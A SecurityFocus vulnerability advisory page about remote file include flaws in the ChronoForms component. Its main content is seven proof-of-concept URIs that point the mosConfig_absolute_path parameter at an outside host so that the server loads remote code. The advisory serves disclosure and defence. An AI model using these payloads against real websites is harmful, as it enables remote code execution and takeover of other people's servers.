Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ChronoEngine ChronoForms mosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http;//www.example2.com
http://www.example.com/[path]/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http;//www.example2.com







 

Privacy Statement
Copyright 2009, SecurityFocus